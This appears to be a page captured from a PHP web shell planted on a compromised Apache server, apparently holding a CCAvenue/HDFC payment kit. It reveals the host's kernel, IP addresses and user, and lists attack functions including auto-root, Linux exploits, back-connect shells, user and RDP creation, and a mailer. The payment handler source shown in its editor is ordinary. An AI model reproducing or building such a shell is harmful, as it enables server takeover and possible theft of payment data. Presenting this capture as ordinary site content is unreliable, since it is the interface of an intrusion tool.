Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.145.43.92
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
gfgcg /
hdfc /
IFRAME_KIT /
[ HOME SHELL ]
Name
Size
Permission
Action
Crypto.php
1.99
KB
-rwxr-xr-x
ccavRequestHandler.php
1006
B
-rwxr-xr-x
ccavRequestHandler.php~
1006
B
-rwxr-xr-x
ccavResponseHandler.php
1.37
KB
-rwxr-xr-x
dataFrom.htm
4.82
KB
-rwxr-xr-x
dataFrom.htm~
4.83
KB
-rwxr-xr-x
jquery-1.7.2.js
92.62
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ccavRequestHandler.php
<html> <head> <title> Iframe</title> </head> <body> <center> <?php include('Crypto.php')?> <?php error_reporting(0); $working_key='';//Shared by CCAVENUES $access_code='';//Shared by CCAVENUES $merchant_data=''; foreach ($_POST as $key => $value){ $merchant_data.=$key.'='.$value.'&'; } $encrypted_data=encrypt($merchant_data,$working_key); // Method for encrypting the data. $production_url='https://secure.ccavenue.com/transaction/transaction.do?command=initiateTransaction&encRequest='.$encrypted_data.'&access_code='.$access_code; ?> <iframe src="<?php echo $production_url?>" id="paymentFrame" width="482" height="450" frameborder="0" scrolling="No" ></iframe> <script type="text/javascript" src="jquery-1.7.2.js"></script> <script type="text/javascript"> $(document).ready(function(){ window.addEventListener('message', function(e) { $("#paymentFrame").css("height",e.data['newHeight']+'px'); }, false); }); </script> </center> </body> </html>
Close